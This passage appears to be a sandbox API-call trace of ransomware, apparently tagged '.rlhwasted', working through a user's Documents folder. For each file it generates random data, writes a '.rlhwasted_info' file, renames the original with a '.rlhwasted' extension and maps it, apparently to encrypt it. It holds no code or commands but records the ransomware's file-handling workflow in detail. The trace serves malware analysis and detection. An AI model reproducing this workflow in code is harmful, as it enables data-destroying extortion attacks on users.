(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjsjzmwhtqdva1ootj.ppt.rlhwasted")) returned 1 [0189.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cjsJzmwhtqdvA1OOTJ.ppt.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjsjzmwhtqdva1ootj.ppt.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0189.209] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0189.212] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0189.213] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.213] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.213] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0189.214] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0189.214] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.224] SetEndOfFile (hFile=0x104) returned 1 [0189.226] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb420 | out: hHeap=0x6b0000) returned 1 [0189.226] CloseHandle (hObject=0x104) returned 1 [0189.227] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0189.227] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0189.228] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0189.228] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.228] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eNy-9pRVeWtEWhEu9.xlsx") returned 66 [0189.228] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28e) returned 0x6ee458 [0189.228] lstrcpyW (in: lpString1=0x6ee4dc, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.228] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fb420 [0189.228] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0189.229] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6fb420 | out: pbBuffer=0x6fb420) returned 1 [0189.229] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eNy-9pRVeWtEWhEu9.xlsx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eny-9prvewtewheu9.xlsx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0189.230] WriteFile (in: hFile=0x104, lpBuffer=0x6fb420*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6fb420*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0189.231] SetEndOfFile (hFile=0x104) returned 1 [0189.231] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.231] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb420 | out: hHeap=0x6b0000) returned 1 [0189.231] lstrcpyW (in: lpString1=0x6ee4dc, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.231] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eNy-9pRVeWtEWhEu9.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eny-9prvewtewheu9.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eNy-9pRVeWtEWhEu9.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eny-9prvewtewheu9.xlsx.rlhwasted")) returned 1 [0189.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eNy-9pRVeWtEWhEu9.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eny-9prvewtewheu9.xlsx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0189.232] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0189.233] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0189.234] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.234] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.234] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0189.235] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0189.235] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.245] SetEndOfFile (hFile=0x104) returned 1 [0189.247] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb420 | out: hHeap=0x6b0000) returned 1 [0189.247] CloseHandle (hObject=0x104) returned 1 [0189.252] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0189.252] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0189.315] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0189.315] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.315] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\giV931txRdw.pptx") returned 60 [0189.315] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x6ee458 [0189.315] lstrcpyW (in: lpString1=0x6ee4d0, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.315] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.315] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0189.316] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.316] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\giV931txRdw.pptx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\giv931txrdw.pptx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0189.456] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0189.457] SetEndOfFile (hFile=0x110) returned 1 [0189.457] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.457] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.457] lstrcpyW (in: lpString1=0x6ee4d0, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\giV931txRdw.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\giv931txrdw.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\giV931txRdw.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\giv931txrdw.pptx.rlhwasted")) returned 1 [0189.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\giV931txRdw.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\giv931txrdw.pptx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0189.458] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0189.459] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0189.460] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.460] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.460] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0189.461] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0189.461] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.471] SetEndOfFile (hFile=0x110) returned 1 [0189.474] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.474] CloseHandle (hObject=0x110) returned 1 [0189.476] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0189.476] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0189.477] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0189.477] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.477] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hnyr08u.docx") returned 56 [0189.477] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27a) returned 0x6ee458 [0189.477] lstrcpyW (in: lpString1=0x6ee4c8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.477] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.477] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0189.478] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.478] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hnyr08u.docx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hnyr08u.docx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0189.479] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0189.480] SetEndOfFile (hFile=0x110) returned 1 [0189.480] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.481] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.481] lstrcpyW (in: lpString1=0x6ee4c8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hnyr08u.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hnyr08u.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hnyr08u.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hnyr08u.docx.rlhwasted")) returned 1 [0189.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hnyr08u.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hnyr08u.docx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0189.482] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0189.484] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0189.486] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.486] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.486] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0189.487] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0189.487] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.497] SetEndOfFile (hFile=0x110) returned 1 [0189.500] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.500] CloseHandle (hObject=0x110) returned 1 [0189.502] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0189.502] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f98) returned 1 [0189.532] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0189.532] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0189.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\06oU-LkWco7xiE.pps") returned 80 [0189.532] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0189.532] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.532] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.532] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f98) returned 1 [0189.533] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.533] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0189.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\06oU-LkWco7xiE.pps.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\06ou-lkwco7xie.pps.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0189.535] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0189.536] SetEndOfFile (hFile=0x110) returned 1 [0189.536] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.536] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.536] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\06oU-LkWco7xiE.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\06ou-lkwco7xie.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\06oU-LkWco7xiE.pps.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\06ou-lkwco7xie.pps.rlhwasted")) returned 1 [0189.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\06oU-LkWco7xiE.pps.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\06ou-lkwco7xie.pps.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0189.540] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0189.543] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f98) returned 1 [0189.544] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x1b8, pbBuffer=0x6ee4a0 | out: pbBuffer=0x6ee4a0) returned 1 [0189.544] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0189.544] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f98) returned 1 [0189.545] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0189.545] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0189.556] SetEndOfFile (hFile=0x110) returned 1 [0189.558] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.558] CloseHandle (hObject=0x110) returned 1 [0189.560] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0189.561] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f98) returned 1 [0189.562] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0189.562] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0189.562] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\aPG49Vcbg-K-wVdwZpsT.odt") returned 94 [0189.562] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c6) returned 0x6ee458 [0189.562] lstrcpyW (in: lpString1=0x6ee514, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.562] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.562] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f98) returned 1 [0189.563] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.563] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0189.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\aPG49Vcbg-K-wVdwZpsT.odt.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\apg49vcbg-k-wvdwzpst.odt.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0189.564] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0189.600] SetEndOfFile (hFile=0x110) returned 1 [0189.600] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.600] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.600] lstrcpyW (in: lpString1=0x6ee514, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\aPG49Vcbg-K-wVdwZpsT.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\apg49vcbg-k-wvdwzpst.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\aPG49Vcbg-K-wVdwZpsT.odt.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\apg49vcbg-k-wvdwzpst.odt.rlhwasted")) returned 1 [0189.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\aPG49Vcbg-K-wVdwZpsT.odt.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\apg49vcbg-k-wvdwzpst.odt.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0189.601] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0189.603] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0189.604] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0189.604] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.604] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0189.605] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0189.605] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.616] SetEndOfFile (hFile=0x110) returned 1 [0189.618] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.618] CloseHandle (hObject=0x110) returned 1 [0189.620] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0189.620] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0189.622] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0189.622] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\Nx6o.doc") returned 78 [0189.622] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a6) returned 0x6ee458 [0189.622] lstrcpyW (in: lpString1=0x6ee4f4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.622] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.622] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0189.623] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.623] 